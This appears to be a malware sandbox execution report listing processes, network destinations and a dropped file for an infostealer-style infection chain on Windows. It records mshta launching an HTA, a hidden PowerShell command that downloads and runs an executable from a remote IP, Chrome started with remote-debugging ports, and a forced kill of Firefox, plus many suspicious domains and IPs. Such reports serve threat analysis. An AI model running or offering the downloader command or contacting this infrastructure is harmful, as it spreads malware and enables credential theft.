C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\FhzKbqCT0.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1140,i,17209538232387302983,15566976510645219374,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef65d9758,0x7fef65d9768,0x7fef65d9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1140 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1544 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2668 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2676 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10110500101\8ce1456568.exe
"C:\Users\Admin\AppData\Local\Temp\10110500101\8ce1456568.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1328 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3792 --field-trial-handle=1296,i,4215679418531302048,15642406043272227448,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef65d9758,0x7fef65d9768,0x7fef65d9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1180 --field-trial-handle=1284,i,7477667443213596592,6875119467050595597,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1456 --field-trial-handle=1284,i,7477667443213596592,6875119467050595597,131072 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1212
C:\Users\Admin\AppData\Local\Temp\10110510101\9bcb2b34db.exe
"C:\Users\Admin\AppData\Local\Temp\10110510101\9bcb2b34db.exe"
C:\Users\Admin\AppData\Local\Temp\10110520101\926589aff2.exe
"C:\Users\Admin\AppData\Local\Temp\10110520101\926589aff2.exe"
C:\Users\Admin\AppData\Local\Temp\10110520101\926589aff2.exe
"C:\Users\Admin\AppData\Local\Temp\10110520101\926589aff2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 608 -s 508
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6489758,0x7fef6489768,0x7fef6489778
C:\Users\Admin\AppData\Local\Temp\10110530101\19001abe36.exe
"C:\Users\Admin\AppData\Local\Temp\10110530101\19001abe36.exe"
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1092 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2304 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2312 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1460 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2216 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3472 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3608 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3748 --field-trial-handle=1352,i,17189706894307303070,816093535405100212,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10110540101\d6fa193726.exe
"C:\Users\Admin\AppData\Local\Temp\10110540101\d6fa193726.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Guest Profile"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef65d9758,0x7fef65d9768,0x7fef65d9778
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1116 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2356 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2684 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2692 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2016 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 --field-trial-handle=1380,i,16146683457448273800,17841493845431474300,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10110550101\ff5f2c6bdb.exe
"C:\Users\Admin\AppData\Local\Temp\10110550101\ff5f2c6bdb.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 1200
C:\Users\Admin\AppData\Local\Temp\10110560101\4845565179.exe
"C:\Users\Admin\AppData\Local\Temp\10110560101\4845565179.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="System Profile"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6489758,0x7fef6489768,0x7fef6489778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1064 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1532 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2176 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2532 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2540 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1284 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3784 --field-trial-handle=1272,i,4227060164290469728,5103355242273556082,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10110570101\23443213b9.exe
"C:\Users\Admin\AppData\Local\Temp\10110570101\23443213b9.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| US | 8.8.8.8:53 | dugong.ydns.eu | udp |
| DE | 38.180.229.217:80 | dugong.ydns.eu | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | avx.medianewsonline.com | udp |
| BG | 185.176.43.98:80 | avx.medianewsonline.com | tcp |
| BG | 185.176.43.98:80 | avx.medianewsonline.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| N/A | 127.0.0.1:9229 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| DE | 38.180.229.217:80 | dugong.ydns.eu | tcp |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| DE | 5.75.210.149:443 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| N/A | 127.0.0.1:9229 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| DE | 5.75.210.149:443 | tcp | |
| DE | 38.180.229.217:80 | dugong.ydns.eu | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| N/A | 127.0.0.1:9229 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| DE | 5.75.210.83:443 | tcp | |
| DE | 5.75.210.83:443 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| DE | 5.75.210.83:443 | tcp | |
| DE | 5.75.210.83:443 | tcp | |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.16.1:443 | exarthynature.run | tcp |
| US | 104.21.16.1:443 | exarthynature.run | tcp |
| DE | 5.75.210.83:443 | tcp | |
| US | 104.21.16.1:443 | exarthynature.run | tcp |
| DE | 5.75.210.83:443 | tcp | |
| DE | 5.75.210.83:443 | tcp | |
| DE | 5.75.210.83:443 | tcp | |
| DE | 5.75.210.83:443 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| DE | 5.75.210.83:443 | tcp | |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.201.110:443 | apis.google.com | udp |
| GB | 142.250.187.202:443 | ogads-pa.googleapis.com | udp |
| GB | 142.250.187.202:443 | ogads-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| DE | 5.75.210.83:443 | tcp | |
| DE | 5.75.210.83:443 | tcp | |
| DE | 5.75.210.83:443 | tcp | |
| DE | 5.75.210.83:443 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 8.8.8.8:53 | croprojegies.run | udp |
| US | 104.21.112.1:443 | croprojegies.run | tcp |
| DE | 5.75.210.83:443 | tcp | |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| DE | 5.75.210.83:443 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| DE | 5.75.210.83:443 | tcp | |
| DE | 5.75.210.83:443 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| DE | 5.75.210.83:443 | tcp | |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4086 | towerbingobongoboom.com | tcp |
| DE | 5.75.210.83:443 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\uQGIWnT9Z.hta
